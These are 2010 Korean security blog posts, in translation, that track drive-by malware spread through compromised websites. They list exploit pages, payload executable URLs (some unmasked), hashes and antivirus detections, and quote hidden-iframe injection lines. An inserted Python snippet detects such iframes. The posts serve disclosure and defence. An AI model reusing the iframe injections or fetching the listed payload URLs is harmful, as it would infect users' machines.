posted by Kwan's 2010. 11. 23. 12:02

1. Sites !!

레이xx 클럽 : http://www.rxxexx.co.kr
옐xx x 택배 : http://www.yelxxxxx.co.kr
피자 xx : http://www.pizzxexxxx.com
게xx젤 : http://www.gaxxxxxel.com
개xx 닷컴 : http://www.gexxmxon.com
安康x政网x迎您 : http://www.xxcx.gov.cn
브레이크 xx : http://www.breakxxxx.com
한국xxxxx연합회 : http://www.xxxwxl.or.kr and many others

2. Distribution URLs !!

[Distributing site unknown]

2010/11/20

http://1x4.2xx.87.1x5/help.asp

[레이xx 클럽, 옐xx x 택배, 피자 xx]

2010/11/17

http://58.1xx.227.1x/F.asp
http://58.1xx.227.1x/./F2.asp 

2010/11/20

http://123.2x4.1x2.1xx/P.asp
http://123.2x4.1x2.1xx/./P1.asp

[게XX젤]

2010/11/20 ~ 2010/11/21

http://cyxxx.net/adv.htm ~> XOR transformation required !!
http://cyxxx.net/K.Js 

[개xx 닷컴]

2010/11/21

http://118.2xx.181.1x9:9x99/vod.js
http://118.2xx.181.1x9:9x99/vod.asp
http://118.2xx.181.1x9:9x99/index.htm
http://114.20x.87.xx/test.htm
http://114.20x.87.xx/test.htm

[安康x政网x迎您]

2010/11/21

http://www.bjxrmxx.com/maxxgeradmin/dataxxckup/ie.htm
http://www.bjxrmxx.com/maxxgeradmin/dataxxckup/pack.exe
http://www.bjxrmxx.com/maxxgeradmin/dataxxckup/test.html

[브레이크 xx]

2010/11/21

http://www.breakxxxx.com/xxxx/tv.htm
http://www.breakxxxx.com/xxxx/tvx.html
http://www.breakxxxx.com/xxxx/tvj.html

[한국XXXXX연합회]

2010/11/07

http://www.woxxxzz.com/images/img.js
http://www.woxxxzz.com/images/kol.htm
http://www.woxxxzz.com/images/sky.html
http://www.woxxxzz.com/images/count.html

2010/11/11

http://www.xxbax.com/DicxData/img.js
http://www.xxbax.com/DicxData/kol.htm
http://www.xxbax.com/DicxData/sky.html
http://www.xxbax.com/DicxData/count.html

2010/11/20

http://www.sxmxxcaux.com/imagex/pic.js
http://www.samxxcaux.com/imagex/sos.htm
http://www.samxxcaux.com/imagex/ner.html
http://www.samxxcaux.com/imagex/count.html

2010/11/23

http://www.xuxx9.com/image/pic.js
http://www.xuxx9.com/image/ner.html
http://www.xuxx9.com/image/sos.htm
http://www.xuxx9.com/image/count.html

3. Final files !!

help.asp : http://121.2xx.1x5.2xx/wxc/ad.exe

F.asp , F2.asp : http://cybexoxxhid.net/bxs/xxon/c.exe

P.asp , P1.asp : http://www.vxx.co.kr/cxxd/lib.exe

adv.htm : http://cyxxx.net/cy.exe

vod.asp : http://www.robotxxx.com/cafe/hxxx/box.exe

test.htm : http://www.robotxxx.com/cafe/xxxx/page/mam.exe

test.html : http://1x7.x.0.1/a.exe  http://www.xjsrmxx.com/maxxgeradmin/dataxxckup/scvhost.txt

tvx.html : http://128.1xx.3x.8x/w.exe

tvj.html : http://128.1xx.30.8x/s.exe

[2010/11/07]

kol.htm , sky.html : http://www.Jxcxx.com/images/s.exe

[2010/11/11]

kol.htm , sky.html : http://www.plxtixxxchina.com/images/s.exe

s.exe : http://98.1xx.64.1xx:6x688/img/img.txt 
           http://98.1xx.64.1xx:6x688/img/Advythsvlfgmf1.exe

[2010/11/20]

sos.htm , ner.html : http://www.cnxx.com.cn/images/s.exe

s.exe : http://www.xamxxcaux.com/images/count.html
           http://76.7x.8x.2:6xx88/img/YkaposdYals1.exe

[2010/11/23]

ner.html , sos.htm : http://www.uxxxn.cn/images/s.exe

s.exe : http://76.7x.8x.3:616xx/img/img.txt
           http://76.7x.8x.3:616xx/img/SkaposKdyals1.exe

4. Sample detection status !!

[AhnLab]

1. ner.html ~> malicious
2. sos.htm ~> malicious
3. pic.js ~> malicious
4. P.asp ~> malicious
5. P1.asp ~> V3 : JS/Downloader (added : 2010.11.22.04)
6. lib.exe ~> V3 : Win-Trojan/Injector.103437 (added : 2010.11.22.04)
7. cy.exe_Kwan ~> V3 : Win-Trojan/Vilsel.106496.G (added : 2010.11.22.02)
8. help.asp ~> V3 : JS/Downloader (added : 2010.11.22.02)
9. s.exe ~> V3 : Win-Trojan/Xema.variant (added : 2010.11.22.01)
10. YkaposdYals1.exe ~> V3 : Win-Trojan/Securisk (added : 2010.11.21.01)
11. ad.exe ~> V3 : Win-Trojan/Injector.55296.BD (added : 2010.11.21.01)
12. adv.htm ~> V3 : JS/Cve-2010-0806 (added : 2010.11.21.01)
13. cy.exe ~> clean
14. ie.htm ~> V3 : JS/Exploit-cve (added : 2010.11.22.02)
15. tv.htm ~> V3 : JS/Agent (added : 2010.11.22.02)
16. tvx.html ~> V3 : JS/Exploit-cve (added : 2010.11.22.02)
17. scvhost.txt ~> V3 : Win-Trojan/Malware.153349 (added : 2010.11.22.00)
18. pack.exe_xor ~> V3 : Win-Trojan/Malware.153349 (added : 2010.11.22.00)
19. s.exe ~> V3 : Win-Trojan/Injector.55296.BE (added : 2010.11.21.01)
20. mam.exe ~> V3 : Win-Trojan/Onlinegamehack.55296.BB (added : 2010.11.21.01)
21. box.exe ~> V3 : Win-Trojan/Onlinegamehack.55296.BB (added : 2010.11.21.01)
22. w.exe ~> V3 : Win-Trojan/Injector.55296.BE (added : 2010.11.21.01)
23. vod.asp ~> V3 : JS/Exploit (added : 2010.11.21.01)
24. tvj.html ~> V3 : JS/Shellcode (added : 2010.11.18.05)
25. test.html ~> V3 : JS/Cve-2010-3962 (added : 2010.11.13.00)
26. test.htm ~> V3 : HTML/Agent (added : 2010.11.13.00)
27. ak.swf ~> clean
28. vod.js ~> clean
29. index.htm ~> clean
30. ner.html ~> malicious
31. pic.js ~> malicious
32. sos.htm ~> malicious
33. SkaposKdyals1.exe ~> malicious
34. s.exe ~> malicious

[ESTsoft]

All samples have been added to the update !!!

[Naver, INCA Internet]

Samples to be reflected in an update after analysis !!

Because of the huge number of samples, I am omitting the VirusTotal results~
Writing after such a long time is pretty tiring !! ha


posted by Kwan's 2010. 10. 1. 09:23

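Following 세의's Aladdin series, and as if not to be outdone, the portal site Career has also started distributing malware, on a weekday. I confirmed that the page was tampered with this afternoon. As a result, a malicious link has also been inserted into http://job.XXXX.net, so distribution can currently be confirmed on the job sites Career and Job NEXT !!

I debated whether to write about this last week as well, and since it is being distributed again I am writing this post. In any case, you should be very careful with these two sites, or rather, you should not visit them at all !! The malware is being distributed from Career and NEXT음. The cause currently appears to lie with Career, which was infected first. It seems to have spread to job.XXXX.net from Career's http://www.caxxxx.co.kr/js/job_rnd_list.js.
Either way, it seems that on Career you are infected as soon as you open the main site, and on JOB NEXT음 as soon as you open the JOB section.

[Summary]

Initial distribution site : http://www.caxxxx.co.kr/
Secondary distribution site : http://job.xxxx.net
Malicious iframe injection : http://xxxx.xxxx.net/xx/jquery.min.js
JS linking to the malware : http://2xx.143.48.xxx/xx/si.js
Link to final file : http://2xx.143.48.xxx/xx/si.asp
Final file : http://www.sixxx.or.kr/xxot/txxx/down.exe

Of these, si.js readily reveals the .asp page if you simply look at what it outputs.

Output : document.write("<iframe src= http://2xx.143.48.xxx/xx/si.asp width=0 height=0></iframe>");

[VirusTotal]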

File name:

si.js

Result:
6/ 43 (14.0%)

MD5: 82360d68e71cf37ae4400295f1746f08
SHA1: f67661ca29e253fde9bfda1ab5e0f54a0ddbf9dc
SHA256: 0536c42b0bbcbc8a4db28fe2f0931eee93bda5b1c8586682293e1a8664fc61de
File size: 424 bytes
Scan date: 2010-10-01 00:13:28 (UTC)

File name:
si.asp
Result:
6/ 43 (14.0%)

MD5: 5d9c846e08a768f648080e5d207aeb47
SHA1: f24d4dba37fd16eba993f337dbf357fca94dc533
SHA256: d795c3be4ec899f70b4b6c6c5e6900ef0537001072b92a304319c6f314d09034
File size: 6015 bytes
Scan date: 2010-10-01 00:13:31 (UTC)


File name:
down.exe
Result:
30/ 43 (69.8%)

MD5: 18d7b00b5d37587c7456b3c3a1181a69
SHA1: fcb91ed3d3b5e498bf3b4ce508351f3e3c51dab5
SHA256: 960af5ab7b18c06b4e4bb0580265585df20510f025b89300e7f364e800cbfa83
File size: 54272 bytes
Scan date: 2010-10-01 00:19:25 (UTC)

Reported to : AhnLab, ESTsoft, Naver, INCA Internet

[AhnLab]

1 si.js ~> V3 : JS/Downloader (added : 2010.10.01.00)
2 down.exe ~> V3 : Win-Trojan/Agent.54272.NF (added : 2010.10.01.00)
3 si.asp ~> V3 : JS/Cve-2010-0806 (added : 2010.10.01.00)


posted by Kwan's 2010. 7. 9. 14:34
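It currently appears that a malicious iframe has been inserted into the site of a certain mobile phone carrier, 큐x텔, and is connecting out.
Looking at the site's page source, you can quickly see that malicious code has been inserted !!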
</script>
</head>
<iframe height=0 width=0 Src= http://110.xx.139.2x1/css/Lib.asp </iframe>
<body style="margin:0" bgcolor="#ffffff">
<script language="JavaScript">flash('/inc/flash/main.swf','936','232','1');</script>

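It had been quiet for a few weeks, but the site seems to have been infected with malware once again. It has happened again after only two weeks, so I wonder what the administrator is doing. Still, perhaps because the script is not an old one, most vendors detect all of it, so there seems to be no need to report it. Even the location of the final file is the same as before, so by now I just take it as a matter of course and move on. Still, this is a carrier, and people who come for phone updates or information could easily be infected if they have no antivirus. I hope the administrator sees this soon and removes it !!

Infected site : http://www.cuxxtel.com
Malicious distribution URL : http://110.xx.139.2x1/css/Lib.asp
Final file : http://61.1xx.x.93/css/isa.exe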
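
The two injection forms shown on this page, the static zero-size iframe sitting between </head> and <body> and the document.write(...) iframe that si.js outputs, can both be flagged by one scanner. This is an added example, not code from the original posts; the function names, the page hosts and the sample markup (which uses documentation-range addresses) are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Regexes instead of an HTML parser: injected tags are often malformed
# (missing '>' or a space after '='), as in the snippets on this page.
IFRAME_RE = re.compile(r"<iframe\b([^<>]*)", re.IGNORECASE)
ATTR_RE = re.compile(r"""([A-Za-z-]+)\s*=\s*("[^"]*"|'[^']*'|[^\s"'<>]+)""")
DOCWRITE_RE = re.compile(r"document\.write(?:ln)?\s*\(", re.IGNORECASE)
BODY_RE = re.compile(r"<body\b", re.IGNORECASE)
HIDDEN_STYLE_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden",
                             re.IGNORECASE)


def parse_attrs(raw):
    """Return lower-cased attribute names mapped to unquoted values."""
    attrs = {}
    for name, value in ATTR_RE.findall(raw):
        # Browsers keep the first occurrence of a duplicated attribute.
        attrs.setdefault(name.lower(), value.strip("\"'").strip())
    return attrs


def is_tiny(value):
    """True for 0, 1, '0px'; False for missing or percentage sizes."""
    m = re.fullmatch(r"(\d+)(?:px)?", (value or "").strip().lower())
    return bool(m) and int(m.group(1)) <= 1


def is_offsite(src, page_host):
    """True when src names a host that is neither page_host nor a subdomain."""
    try:
        host = (urlsplit(src).hostname or "").lower()
    except ValueError:
        return True  # an unparseable authority is suspicious in itself
    page_host = page_host.lower()
    return bool(host) and host != page_host and not host.endswith("." + page_host)


def find_hidden_iframes(source, page_host):
    """Report iframes that are both invisible and loaded from another host."""
    body = BODY_RE.search(source)
    findings = []
    for m in IFRAME_RE.finditer(source):
        attrs = parse_attrs(m.group(1))
        src = attrs.get("src", "")
        reasons = []
        if (is_tiny(attrs.get("width")) or is_tiny(attrs.get("height"))
                or HIDDEN_STYLE_RE.search(attrs.get("style", ""))):
            reasons.append("invisible")
        if is_offsite(src, page_host):
            reasons.append("off-site")
        # Tag text emitted by script, as in the si.js output quoted above.
        if DOCWRITE_RE.search(source, max(0, m.start() - 40), m.start()):
            reasons.append("script-written")
        # A frame placed ahead of <body> is not part of the page layout.
        if body and m.start() < body.start():
            reasons.append("before-body")
        if "invisible" in reasons and "off-site" in reasons:
            findings.append({"src": src, "reasons": reasons})
    return findings


# Constructed sample modelled on the infected page source shown above.
INFECTED_PAGE = """<html><head><script src="/js/main.js"></script>
</head>
<iframe height=0 width=0 Src= http://192.0.2.10/css/Lib.asp </iframe>
<body style="margin:0" bgcolor="#ffffff">
<iframe src="/banner/top.html" width="728" height="90"></iframe>
<iframe src="https://video.example.net/embed/1" width="560" height="315"></iframe>
</body></html>"""

# Constructed sample modelled on the si.js output line.
INJECTED_JS = ('document.write("<iframe src= http://192.0.2.20/xx/si.asp '
               'width=0 height=0></iframe>");')

if __name__ == "__main__":
    samples = (("page", INFECTED_PAGE, "www.example.co.kr"),
               ("script", INJECTED_JS, "job.example.net"))
    for label, text, host in samples:
        for finding in find_hidden_iframes(text, host):
            print(label, finding["src"], ",".join(finding["reasons"]))
```

Visible off-site embeds and same-site hidden frames are deliberately not reported, so the output stays limited to the combination seen in these incidents.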

[VirusTotal results]

Scanned file: lib.asp Submitted: 2010.07.09 05:04:15 (UTC)
 
Additional information
File size: 5851 bytes
MD5...: 51e7b5fe2fa7ef45de3b3671ba91b011
SHA1..: e6e7dd63b6de5b8b24c5a91d001d23a01de8186b
SHA256: 1d373a0cd0b239795370655695fb7db3138ab1aa1a4cb4df676f72150d82a7b9

Scanned file: isa.exe Submitted: 2010.07.09 05:04:22 (UTC)
 
Additional information
File size: 55296 bytes
MD5...: a4bd25915a827fe01c44926cc44273fe
SHA1..: 0748e6f3d2a27a5b852737bd40a86d9dcdce06c3
SHA256: d030b52bafbe52bb6e2527e94a325b1e3c996e17eab2789c601179bdb5e9c9ea



  1. hoo 2010.07.09 16:41

    These just keep coming..
    Thanks for the post~

    • Kwan's 2010.07.10 17:30

      Lib.asp is always distributed from the same place, and seeing that it still has not been deleted, the administrator must have given up on it~

posted by Kwan's 2010. 5. 17. 12:26

1. Sites

Korea e-Sports Association : http://www.xrogamer.or.kr
Daemyung Resort : http://www.xaemyungresort.com/asp/main.asp0
Pruna : http://www.xruna.com
Pruna Search : http://vxd.xruna.com/search/search_list3.asp0
CJ Entertainment : http://www.xjent.co.kr
SSO KBS : http://sso.xbs.co.kr
Cinema KBS : http://xnema.kbs.co.kr
Cinetong : http://www.xnetong.com
Gametime : http://www.xametime.co.kr/main.asp

2. Distribution sites

1. Korea e-Sports Association
http://61.100.9.219/club/xod.asp ~> server alive!
http://61.100.7.171/css/xib.asp ~> server dead!
http://97.xx.8x.1x8/xM.asp ~> server alive!

2. Daemyung Resort
http://61.100.9.219/club/xod.asp ~> server alive!

3. Pruna
http://61.100.9.219/club/xod.asp ~> server alive!

4. Pruna Search
http://vxd.xruna.com/search/xearch_list3.asp ~> server alive!

5. CJ Entertainment
http://61.100.7.171/css/xib.asp ~> server dead!
http://ac.gemmir.com/t/xime.asp ~> server dead!

6. SSO KBS
http://202.133.245.100/xxam.asp ~> server alive!

7. Cinema KBS
http://220.95.233.16/ads/xime.asp ~> server dead!

8. Cinetong
http://97.74.87.198/xM.asp ~> server alive!
http://www.kpma.or.kr/css/MG.asp0 ~> server alive!

9. Gametime

http://adsys.gametime.co.kr/include/topbenner_s2.asp ~> server alive!
http://koreachangup.chosun.com/css/ads.asp ~> server alive!

Final files :

god.asp , lib.asp : http://x1.100.1.93/css/isa.exe ~> server alive!

time.asp : http://www.xobot114.com/cafe/help/box.exe ~> server alive!

GM.asp , MG.asp : http://x1.100.1.93/admin/G.exe ~> server alive!

sxxxxh_xxx3.asp : http://xile.ygfamily.com/php/i./c.exe ~> server alive!

exam.asp : http://xwww.erounmall.com/cache/tmp/514.exe ~> server alive!

ads.asp : http://xoreachangup.chosun.com/1.exe ~> server alive! (XOR transformation required)

[VirusTotal]

Scanned file: god.asp Submitted: 2010.05.17 01:17:28 (UTC)
 
Additional information
File size: 5851 bytes
MD5...: 51e7b5fe2fa7ef45de3b3671ba91b011
SHA1..: e6e7dd63b6de5b8b24c5a91d001d23a01de8186b
SHA256: 1d373a0cd0b239795370655695fb7db3138ab1aa1a4cb4df676f72150d82a7b9

Scanned file: GM.asp Submitted: 2010.05.17 01:17:38 (UTC)
 
Additional information
File size: 5989 bytes
MD5...: 51c8357eff5e42b3143bd7c98e6ebc1e
SHA1..: 7627baf4a5e8e92dd6b20c4692402e79977d510f
SHA256: 2ec43de2fb19f5233450115aa3b75a394735599e8bd370f390f663a58696e88d

Scanned file: god.asp Submitted: 2010.05.17 01:17:46 (UTC)
 
Additional information
File size: 5851 bytes
MD5...: 51e7b5fe2fa7ef45de3b3671ba91b011
SHA1..: e6e7dd63b6de5b8b24c5a91d001d23a01de8186b
SHA256: 1d373a0cd0b239795370655695fb7db3138ab1aa1a4cb4df676f72150d82a7b9

Scanned file: sxxxxh_xxx3.asp Submitted: 2010.05.17 01:21:27 (UTC)
 
Additional information
File size: 5777 bytes
MD5...: a485b05d5035a168bb7fc3fd38220500
SHA1..: 3685084e053db302445caae2bfd63762ebf3b97b
SHA256: 58c9bbeb8f83242d054b71c3863fe87aba222142409d3b6f5f19e3705ca67bc4

Scanned file: time.asp Submitted: 2010.05.17 01:21:37 (UTC)
 
Additional information
File size: 5915 bytes
MD5...: e3b64d8ce979fa63217059b0282133cd
SHA1..: 39b332155b7afd4a7e28ccac991550623d2244c0
SHA256: 0c8a3166567a7596f795790209d661e78ab2ac669d6b34bdaf906ba1e35ea399

Scanned file: exam.asp Submitted: 2010.05.17 01:22:03 (UTC)
 
Additional information
File size: 5902 bytes
MD5...: 8ec3cab47c3e8d7268c24c6f38badb0d
SHA1..: 183e038cac1869814347d31235b804a42d99de0b
SHA256: fe879654e5f88fbedf9d0379dc3860f94b9bdc1e1e9ffd11ed7d7ec3373a2bd1

Scanned file: MG.asp Submitted: 2010.05.17 01:25:30 (UTC)
 
Additional information
File size: 5869 bytes
MD5...: fe08120c7b461c030a8921173eecb022
SHA1..: fa2d931502a0a67e30564c7124053784f9566fc6
SHA256: 5dd43a0b8584668a66861b6e3c89ddf3c12a6d3f8f1d6796921e5c332abe7ee4

Scanned file: ads.asp Submitted: 2010.05.17 01:25:24 (UTC)
 
Additional information
File size: 5954 bytes
MD5...: edadff7a5a455341a877f142d8e95474
SHA1..: 1d004d5eb69bf04d39273fd4e4412e7075f612cf
SHA256: 59424da373e7496ded9b6237ba25eb6165557e950c5b7d5ee0dbba9616ef7cf9
Scanned file: isa.exe Submitted: 2010.05.17 01:27:47 (UTC)
Antivirus Engine version Definition date Result
a-squared 4.5.0.50 2010.05.10 Trojan.Peed!IK
AhnLab-V3 2010.05.16.00 2010.05.15 Malware/Win32.Heur.h4
AntiVir 8.2.1.242 2010.05.16 TR/Crypt.ZPACK.Gen
Antiy-AVL 2.0.3.7 2010.05.14 -
Authentium 5.2.0.5 2010.05.16 -
Avast 4.8.1351.0 2010.05.16 Win32:Malware-gen
Avast5 5.0.332.0 2010.05.16 Win32:Malware-gen
AVG 9.0.0.787 2010.05.16 Generic17.CAMN
BitDefender 7.2 2010.05.17 Trojan.Peed.Gen
CAT-QuickHeal 10.00 2010.05.15 (Suspicious) - DNAScan
ClamAV 0.96.0.3-git 2010.05.16 -
Comodo 4859 2010.05.16 -
DrWeb 5.0.2.03300 2010.05.17 -
eSafe 7.0.17.0 2010.05.16 -
eTrust-Vet 35.2.7490 2010.05.15 -
F-Prot 4.5.1.85 2010.05.16 -
F-Secure 9.0.15370.0 2010.05.17 Trojan.Peed.Gen
Fortinet 4.1.133.0 2010.05.16 -
GData 21 2010.05.17 Trojan.Peed.Gen
Ikarus T3.1.1.84.0 2010.05.17 Win32.SuspectCrc
Jiangmin 13.0.900 2010.05.16 -
Kaspersky 7.0.0.125 2010.05.17 Trojan.Win32.Pincav.aaci
McAfee 5.400.0.1158 2010.05.17 PWS-Mmorpg!pd
McAfee-GW-Edition 2010.1 2010.05.16 Heuristic.LooksLike.Heuristic.BehavesLike.Win32.Downloader.B
Microsoft 1.5703 2010.05.17 Trojan:Win32/Malagent
NOD32 5119 2010.05.17 a variant of Win32/Kryptik.DXI
Norman 6.04.12 2010.05.16 -
nProtect 2010-05-16.01 2010.05.16 Trojan.Peed.Gen
Panda 10.0.2.7 2010.05.16 Trj/CI.A
PCTools 7.0.3.5 2010.05.17 -
Rising 22.47.06.04 2010.05.16 Packer.Win32.UnkPacker.b
Sophos 4.53.0 2010.05.17 Sus/UnkPack-C
Sunbelt 6311 2010.05.17 Trojan.Win32.Generic!BT
Symantec 20101.1.0.89 2010.05.17 -
TheHacker 6.5.2.0.280 2010.05.14 -
TrendMicro 9.120.0.1004 2010.05.16 PAK_Generic.001
TrendMicro-HouseCall 9.120.0.1004 2010.05.17 -
VBA32 3.12.12.5 2010.05.14 Malware-Dropper.Win32.Inject.gen
ViRobot 2010.5.15.2318 2010.05.16 -
VirusBuster 5.0.27.0 2010.05.16 -
 
Additional information
File size: 53248 bytes
MD5...: fd71b8a61f60869bd7ed144a685d8f0c
SHA1..: 5c8245ef4222b4d6b89327ac6c03103e83ea4d96
SHA256: 935ad48441eeedcf7e25289b25e1414e9854593ae88c7fe099f22f8b25172a01
Scanned file: box.exe Submitted: 2010.05.17 01:27:57 (UTC)
Antivirus Engine version Definition date Result
a-squared 4.5.0.50 2010.05.10 Trojan.Peed!IK
AhnLab-V3 2010.05.16.00 2010.05.15 Malware/Win32.Heur.h4
AntiVir 8.2.1.242 2010.05.16 TR/Crypt.ZPACK.Gen
Antiy-AVL 2.0.3.7 2010.05.14 -
Authentium 5.2.0.5 2010.05.16 -
Avast 4.8.1351.0 2010.05.16 Win32:Malware-gen
Avast5 5.0.332.0 2010.05.16 Win32:Malware-gen
AVG 9.0.0.787 2010.05.16 Generic17.CAGA
BitDefender 7.2 2010.05.17 Trojan.Peed.Gen
CAT-QuickHeal 10.00 2010.05.15 (Suspicious) - DNAScan
ClamAV 0.96.0.3-git 2010.05.16 -
Comodo 4859 2010.05.16 TrojWare.Win32.Trojan.Agent.Gen
DrWeb 5.0.2.03300 2010.05.17 Trojan.Siggen1.29725
eSafe 7.0.17.0 2010.05.16 -
eTrust-Vet 35.2.7490 2010.05.15 -
F-Prot 4.5.1.85 2010.05.16 -
F-Secure 9.0.15370.0 2010.05.17 Trojan.Peed.Gen
Fortinet 4.1.133.0 2010.05.16 -
GData 21 2010.05.17 Trojan.Peed.Gen
Ikarus T3.1.1.84.0 2010.05.17 Trojan.Peed
Jiangmin 13.0.900 2010.05.16 Trojan/Pincav.eta
Kaspersky 7.0.0.125 2010.05.17 Trojan.Win32.Pincav.aabq
McAfee 5.400.0.1158 2010.05.17 PWS-LDPinch!dv
McAfee-GW-Edition 2010.1 2010.05.16 Heuristic.LooksLike.Heuristic.BehavesLike.Win32.Downloader.B
Microsoft 1.5703 2010.05.17 Trojan:Win32/Malagent
NOD32 5119 2010.05.17 a variant of Win32/Kryptik.DXI
Norman 6.04.12 2010.05.16 -
nProtect 2010-05-16.01 2010.05.16 Trojan.Peed.Gen
Panda 10.0.2.7 2010.05.16 Trj/CI.A
PCTools 7.0.3.5 2010.05.17 -
Rising 22.47.06.04 2010.05.16 Trojan.Win32.Generic.5204A82F
Sophos 4.53.0 2010.05.17 Sus/UnkPack-C
Sunbelt 6311 2010.05.17 Trojan.Win32.Generic!BT
Symantec 20101.1.0.89 2010.05.17 -
TheHacker 6.5.2.0.280 2010.05.14 -
TrendMicro 9.120.0.1004 2010.05.16 PAK_Generic.001
TrendMicro-HouseCall 9.120.0.1004 2010.05.17 -
VBA32 3.12.12.5 2010.05.14 Malware-Dropper.Win32.Inject.gen
ViRobot 2010.5.15.2318 2010.05.16 -
VirusBuster 5.0.27.0 2010.05.16 -
 
Additional information
File size: 53248 bytes
MD5...: a30fc2768e75f68ef44343f08fd15b47
SHA1..: 889dfa9a43afc7c9bc518e11689753b71f2d4c24
SHA256: 8d05acf3084cf9c8118dd1f33cd3fecae66c276b8121004432c8d262f1faa239
Scanned file: G.exe Submitted: 2010.05.17 01:28:08 (UTC)
Antivirus Engine version Definition date Result
a-squared 4.5.0.50 2010.05.10 -
AhnLab-V3 2010.05.16.00 2010.05.15 Dropper/Killav.104032
AntiVir 8.2.1.242 2010.05.16 -
Antiy-AVL 2.0.3.7 2010.05.14 -
Authentium 5.2.0.5 2010.05.16 W32/OnlineGames.DV.gen!Eldorado
Avast 4.8.1351.0 2010.05.16 Win32:Trojan-gen
Avast5 5.0.332.0 2010.05.16 Win32:Trojan-gen
AVG 9.0.0.787 2010.05.16 Dropper.Generic2.JMD
BitDefender 7.2 2010.05.17 -
CAT-QuickHeal 10.00 2010.05.15 (Suspicious) - DNAScan
ClamAV 0.96.0.3-git 2010.05.16 -
Comodo 4859 2010.05.16 TrojWare.Win32.Trojan.Agent.Gen
DrWeb 5.0.2.03300 2010.05.17 Trojan.PWS.Gamania.24318
eSafe 7.0.17.0 2010.05.16 Suspicious File
eTrust-Vet 35.2.7490 2010.05.15 -
F-Prot 4.5.1.85 2010.05.16 W32/OnlineGames.DV.gen!Eldorado
F-Secure 9.0.15370.0 2010.05.17 -
Fortinet 4.1.133.0 2010.05.16 -
GData 21 2010.05.17 Win32:Trojan-gen
Ikarus T3.1.1.84.0 2010.05.17 -
Jiangmin 13.0.900 2010.05.16 -
Kaspersky 7.0.0.125 2010.05.17 -
McAfee 5.400.0.1158 2010.05.17 -
McAfee-GW-Edition 2010.1 2010.05.16 Heuristic.LooksLike.Win32.SuspiciousPE.F
Microsoft 1.5703 2010.05.17 TrojanDropper:Win32/Frethog.K
NOD32 5119 2010.05.17 -
Norman 6.04.12 2010.05.16 -
nProtect 2010-05-16.01 2010.05.16 -
Panda 10.0.2.7 2010.05.16 Suspicious file
PCTools 7.0.3.5 2010.05.17 -
Prevx 3.0 2010.05.17 -
Rising 22.47.06.04 2010.05.16 Trojan.Win32.Generic.5204B340
Sophos 4.53.0 2010.05.17 Mal/EncPk-OD
Sunbelt 6311 2010.05.17 Trojan.Win32.Generic!BT
Symantec 20101.1.0.89 2010.05.17 -
TheHacker 6.5.2.0.280 2010.05.14 -
TrendMicro 9.120.0.1004 2010.05.16 Cryp_ACProt
TrendMicro-HouseCall 9.120.0.1004 2010.05.17 Cryp_ACProt
VBA32 3.12.12.5 2010.05.14 -
ViRobot 2010.5.15.2318 2010.05.16 -
VirusBuster 5.0.27.0 2010.05.16 -
 
Additional information
File size: 104032 bytes
MD5...: 00420ede432ed70c6e0afecff02b9c36
SHA1..: 52f25ee55a23853d709641bf71574834c48ce311
SHA256: 1a0fc735eb5da8c91cdfd27643282d88689741d66d54cc617def08c4d1a10501
Scanned file: c.exe Submitted: 2010.05.17 01:30:15 (UTC)
Antivirus Engine version Definition date Result
a-squared 4.5.0.50 2010.05.10 Trojan.Peed!IK
AhnLab-V3 2010.05.16.00 2010.05.15 Malware/Win32.Heur.h4
AntiVir 8.2.1.242 2010.05.16 TR/Crypt.ZPACK.Gen
Antiy-AVL 2.0.3.7 2010.05.14 -
Authentium 5.2.0.5 2010.05.16 -
Avast 4.8.1351.0 2010.05.16 Win32:Malware-gen
Avast5 5.0.332.0 2010.05.16 Win32:Malware-gen
AVG 9.0.0.787 2010.05.16 Generic17.CAGA
BitDefender 7.2 2010.05.17 Trojan.Peed.Gen
CAT-QuickHeal 10.00 2010.05.15 (Suspicious) - DNAScan
ClamAV 0.96.0.3-git 2010.05.16 -
Comodo 4859 2010.05.16 TrojWare.Win32.Trojan.Agent.Gen
DrWeb 5.0.2.03300 2010.05.17 Trojan.Siggen1.29725
eSafe 7.0.17.0 2010.05.16 -
eTrust-Vet 35.2.7490 2010.05.15 -
F-Prot 4.5.1.85 2010.05.16 -
F-Secure 9.0.15370.0 2010.05.17 Trojan.Peed.Gen
Fortinet 4.1.133.0 2010.05.16 -
GData 21 2010.05.17 Trojan.Peed.Gen
Ikarus T3.1.1.84.0 2010.05.17 Trojan.Peed
Jiangmin 13.0.900 2010.05.16 Trojan/Pincav.eta
Kaspersky 7.0.0.125 2010.05.17 Trojan.Win32.Pincav.aabq
McAfee 5.400.0.1158 2010.05.17 PWS-LDPinch!dv
McAfee-GW-Edition 2010.1 2010.05.16 Heuristic.LooksLike.Heuristic.BehavesLike.Win32.Downloader.B
Microsoft 1.5703 2010.05.17 Trojan:Win32/Malagent
NOD32 5119 2010.05.17 a variant of Win32/Kryptik.DXI
Norman 6.04.12 2010.05.16 -
nProtect 2010-05-16.01 2010.05.16 Trojan.Peed.Gen
Panda 10.0.2.7 2010.05.16 Trj/CI.A
PCTools 7.0.3.5 2010.05.17 -
Prevx 3.0 2010.05.17 High Risk Cloaked Malware
Rising 22.47.06.04 2010.05.16 Trojan.Win32.Generic.5204A82F
Sophos 4.53.0 2010.05.17 Sus/UnkPack-C
Sunbelt 6311 2010.05.17 Trojan.Win32.Generic!BT
Symantec 20101.1.0.89 2010.05.17 -
TheHacker 6.5.2.0.280 2010.05.14 -
TrendMicro 9.120.0.1004 2010.05.16 PAK_Generic.001
TrendMicro-HouseCall 9.120.0.1004 2010.05.17 -
VBA32 3.12.12.5 2010.05.14 Malware-Dropper.Win32.Inject.gen
ViRobot 2010.5.15.2318 2010.05.16 -
VirusBuster 5.0.27.0 2010.05.16 -
 
Additional information
File size: 53248 bytes
MD5...: a30fc2768e75f68ef44343f08fd15b47
SHA1..: 889dfa9a43afc7c9bc518e11689753b71f2d4c24
SHA256: 8d05acf3084cf9c8118dd1f33cd3fecae66c276b8121004432c8d262f1faa239
Scanned file: 514.exe Submitted: 2010.05.17 01:30:20 (UTC)
Antivirus Engine version Definition date Result
a-squared 4.5.0.50 2010.05.10 Trojan.Peed!IK
AhnLab-V3 2010.05.16.00 2010.05.15 Malware/Win32.Heur.h4
AntiVir 8.2.1.242 2010.05.16 TR/Crypt.ZPACK.Gen
Antiy-AVL 2.0.3.7 2010.05.14 -
Authentium 5.2.0.5 2010.05.16 -
Avast 4.8.1351.0 2010.05.16 Win32:Malware-gen
Avast5 5.0.332.0 2010.05.16 Win32:Malware-gen
AVG 9.0.0.787 2010.05.16 Generic17.CAMR
BitDefender 7.2 2010.05.17 Trojan.Peed.Gen
